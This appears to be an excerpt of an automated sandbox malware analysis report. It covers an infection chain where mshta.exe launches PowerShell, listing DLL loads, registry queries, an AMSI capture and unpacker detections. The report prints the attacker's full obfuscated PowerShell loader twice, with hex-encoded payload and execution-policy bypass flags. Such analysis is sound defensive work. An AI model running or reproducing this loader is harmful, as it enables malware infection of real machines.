Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: protobuf-net.pdbSHA256}Lq source: powershell.exe, 00000004.00000002.3303123052.0000000006F60000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: powershell.exe, 00000004.00000002.3303123052.0000000006F60000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 4.2.powershell.exe.6f60000.2.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 4.2.powershell.exe.6f60000.2.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 4.2.powershell.exe.6f60000.2.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 4.2.powershell.exe.6f60000.2.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 4.2.powershell.exe.6f60000.2.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: FromBase64String($Z));$ByTESTring = $eNC.$5i0JbyjAuxq1w2syC8nBHy6E2dFhjl9Jo19iPGiz68mBwchiWcAMIFdgIuM6C1BigrxWztkc1ltpoJyxzjE1vr83aYHbceP72RVCYl29Wo0DYCMUc7r2H3c2TPUFgK5J0F8KYw4smX8q71CMT82gf9PkIMLXvs

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function rOnH($ZugfP){return -split ($ZugfP -replace '..', '0x$& ')};$hcNM = rOnH('C3930BC54871F266AFF2C12A03BE01BAC619730D50B7B296848B0CE355EF4AAD63DAD551CF518740CFF825344B7C3E8930ABD7E087DC165F9FA695481870BD210973CEFFE5F8743015E9E067BE32B8D28FC34D427F57004108D4924938D42B9C68E78C8BAEEC7B88EDBF7E26D65BBEB339C85352398379212A4DA0FDA9378FA9EE2979EF8C68B2C848B07239F0FE9081E18A3E2747428EACAB76496A5D46ECC618715969BEB2AA550FCC19D2801E7412D5CCB10D7FC87B3CCFCA2C5142FFF0A92BF434E5B0634E25F43D5A1D49AF292EF18995535EADD316387361090364FCDB53CF147D38015CDE7C196BCB2487A645FE6E879997DB0B013559AE94AF7AE0A057520D706AABBBB3C4599241DC59E43AF4317BBF33FF72B63C4D6F40A4CF4FBA5443410E7D4FDBB2DAAB0B099C9CBBDF16A73778ACB0AAF9970D84B1C2FE02073C14045A04F38EC73D1F5FE068051B40E010417AE6630AF70E00695C608BC0861330974406C2434CDEF8351AA4C08151E713B3E1161BE6479227D497878812334F53852E161933DF3AC49002F901EF720BD24EBC005803CC3FB5D9730A35474DE935BB0DA3CD0DB74DD2F1A75D4C2C82DEF41F1F7E055AA35E28F60EBC5D1AA4CF8B043E2DB0C3431EC5B92D16094A177AF2C20A61C912B7DE1A05E9AC70C3FC34F259AFBC8229DE2C7404FA77695B9B9B64B6CCCC15261DD3287767966C69CA3447D29F6C28AAED13F5700DD3C2344BBBC440EF822FA03ED85A66458F8096A217892CE5BD92B17A636A13078002A9F12DF30BBC21FBFC27825674E1F156C08B1F7BE8110450AAAFE84A212E2539E9D958C27CBA9258E0F2EB2302B3C025C3E8F2AF1D4975B918F51A7E4B0E2D658450A8BAA98DF067B355E280E6F33E6D6E729F9BF2A721E484C32FC60E22909D4A00F86690A401E2249B69A64B01B2EF84D697A10E34BFB44195CEFA63C8603AC785033B7F295FB45F066E298773D832DB3E9A5C2228A617A7493C760CF7B8A234974A7D9FFE59773D18E13F4C2B106A18753CB10177D79E9329A5839F3BBD922320BE5C516B60190FBF08E4F48DD96D3C6FC263511D230C8EE4C5016FCAF3F85211AA23D5D686382382D564C6E8DB3107FB4842199CEAABF6EB258752F65C408D2C95BA3AC3C4BA6634C579D8E2AF7478D305A2B454111CA906551BEDE47D883C897D123DD54DB270EDB40162EDF8558AB2673CED4556848FBD0F0EA7E491C6CB594EC95A7DC54749D99912A60C79DCA4D598AA2335146B6D936341E271B5EE53DC7E88ABFE799563C3F66B92D8E53182F74FE62D5E058B1D6A532974692D259673F216D5E037875DF42348A3CBC56B68E7F61BB04F8DE43B8B56AF5F12EE9CE635F60999BD302D33D994F58D54EACF34355DBB7E858E578C3C464D9DFE385CA2BA8CA5920FA0CD69D14616CF89B14B05812B1E052ECCE3F7FB706D97B865FD0C6506CE32F646039B92F147F82037E1BCA4A16EDE04A52F754852062CC5FFE79F1C1811C2A4EE43FF38387C4CD11A2EDCA6C57216DFC5D9E29ADFF0D5ACCF05998C02101CD723667780F3ECE0C9D8A3501F34E27653C8CC454AC1B9CFD63C7077F0256949AD3E3DAF6C6B099A8FDFBD7D13B638DE640A14ACFA2ED35860392CBFAF118DE0BA089D071F46AB6709E49AD48A6BCB90F215D487648968F3D24E4F165E6104C06BFD0522BF67BD6FC0E5E50796821857A2FB3F2C891AABBA7EF8AD692660794579DB6A00D57FBAF9F2AD64863974071C4D7E8C8BE2BDF8923280C6936769E41E84567C4940EBCD713F945DF7292AD0C75B27F4BEBDD48B6A53C89741AA6E5C0A8E6FA33C1B74178F50FA6FB6249B241DABE92267BC0A3DD4ADC73A94749C2E2EEFFA8DA6F2A045FB97C908B9436225EDF216DAF831E28AC1D8377C036AA3F2324DB4B8937836B29B3712AD27EBE29B03DB7930C6B09326
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function rOnH($ZugfP){return -split ($ZugfP -replace '..', '0x$& ')};$hcNM = rOnH('C3930BC54871F266AFF2C12A03BE01BAC619730D50B7B296848B0CE355EF4AAD63DAD551CF518740CFF825344B7C3E8930ABD7E087DC165F9FA695481870BD210973CEFFE5F8743015E9E067BE32B8D28FC34D427F57004108D4924938D42B9C68E78C8BAEEC7B88EDBF7E26D65BBEB339C85352398379212A4DA0FDA9378FA9EE2979EF8C68B2C848B07239F0FE9081E18A3E2747428EACAB76496A5D46ECC618715969BEB2AA550FCC19D2801E7412D5CCB10D7FC87B3CCFCA2C5142FFF0A92BF434E5B0634E25F43D5A1D49AF292EF18995535EADD316387361090364FCDB53CF147D38015CDE7C196BCB2487A645FE6E879997DB0B013559AE94AF7AE0A057520D706AABBBB3C4599241DC59E43AF4317BBF33FF72B63C4D6F40A4CF4FBA5443410E7D4FDBB2DAAB0B099C9CBBDF16A73778ACB0AAF9970D84B1C2FE02073C14045A04F38EC73D1F5FE068051B40E010417AE6630AF70E00695C608BC0861330974406C2434CDEF8351AA4C08151E713B3E1161BE6479227D497878812334F53852E161933DF3AC49002F901EF720BD24EBC005803CC3FB5D9730A35474DE935BB0DA3CD0DB74DD2F1A75D4C2C82DEF41F1F7E055AA35E28F60EBC5D1AA4CF8B043E2DB0C3431EC5B92D16094A177AF2C20A61C912B7DE1A05E9AC70C3FC34F259AFBC8229DE2C7404FA77695B9B9B64B6CCCC15261DD3287767966C69CA3447D29F6C28AAED13F5700DD3C2344BBBC440EF822FA03ED85A66458F8096A217892CE5BD92B17A636A13078002A9F12DF30BBC21FBFC27825674E1F156C08B1F7BE8110450AAAFE84A212E2539E9D958C27CBA9258E0F2EB2302B3C025C3E8F2AF1D4975B918F51A7E4B0E2D658450A8BAA98DF067B355E280E6F33E6D6E729F9BF2A721E484C32FC60E22909D4A00F86690A401E2249B69A64B01B2EF84D697A10E34BFB44195CEFA63C8603AC785033B7F295FB45F066E298773D832DB3E9A5C2228A617A7493C760CF7B8A234974A7D9FFE59773D18E13F4C2B106A18753CB10177D79E9329A5839F3BBD922320BE5C516B60190FBF08E4F48DD96D3C6FC263511D230C8EE4C5016FCAF3F85211AA23D5D686382382D564C6E8DB3107FB4842199CEAABF6EB258752F65C408D2C95BA3AC3C4BA6634C579D8E2AF7478D305A2B454111CA906551BEDE47D883C897D123DD54DB270EDB40162EDF8558AB2673CED4556848FBD0F0EA7E491C6CB594EC95A7DC54749D99912A60C79DCA4D598AA2335146B6D936341E271B5EE53DC7E88ABFE799563C3F66B92D8E53182F74FE62D5E058B1D6A532974692D259673F216D5E037875DF42348A3CBC56B68E7F61BB04F8DE43B8B56AF5F12EE9CE635F60999BD302D33D994F58D54EACF34355DBB7E858E578C3C464D9DFE385CA2BA8CA5920FA0CD69D14616CF89B14B05812B1E052ECCE3F7FB706D97B865FD0C6506CE32F646039B92F147F82037E1BCA4A16EDE04A52F754852062CC5FFE79F1C1811C2A4EE43FF38387C4CD11A2EDCA6C57216DFC5D9E29ADFF0D5ACCF05998C02101CD723667780F3ECE0C9D8A3501F34E27653C8CC454AC1B9CFD63C7077F0256949AD3E3DAF6C6B099A8FDFBD7D13B638DE640A14ACFA2ED35860392CBFAF118DE0BA089D071F46AB6709E49AD48A6BCB90F215D487648968F3D24E4F165E6104C06BFD0522BF67BD6FC0E5E50796821857A2FB3F2C891AABBA7EF8AD692660794579DB6A00D57FBAF9F2AD64863974071C4D7E8C8BE2BDF8923280C6936769E41E84567C4940EBCD713F945DF7292AD0C75B27F4BEBDD48B6A53C89741AA6E5C0A8E6FA33C1B74178F50FA6FB6249B241DABE92267BC0A3DD4ADC73A94749C2E2EEFFA8DA6F2A045FB97C908B9436225EDF216DAF831E28AC1D8377C036AA3F2324DB4B8937836B29B3712AD27EBE29B03DB7930C6B09326			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_04D54A48 push 00086951h; ret	2_2_04D54A55
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_04D51150 push eax; ret	2_2_04D5115A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_04D51140 push eax; ret	2_2_04D5114A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_04D51160 push eax; ret	2_2_04D5116A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_04D51100 push eax; ret	2_2_04D5113A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00B9284A push ebx; iretd	4_2_00B92862
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_046697C2 push esp; ret	4_2_04669801
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0466818F pushfd ; iretd	4_2_04668193
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_04661303 push ebx; iretd	4_2_04661332
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_04660CE0 push eax; ret	4_2_04660CEA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_04660CF0 push eax; ret	4_2_04660CFA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_04660D00 push eax; ret	4_2_04660D0A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06F531C6 push esp; iretd	4_2_06F531C9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_081E307A push eax; iretd	4_2_081E3081
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0052CD50 push eax; mov dword ptr [esp], E2EDECDFh	8_2_0052CD52
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0051E5E1 push ecx; ret	8_2_0051E5E4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00529DE0 push eax; mov dword ptr [esp], 16171011h	8_2_00529DEE

Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
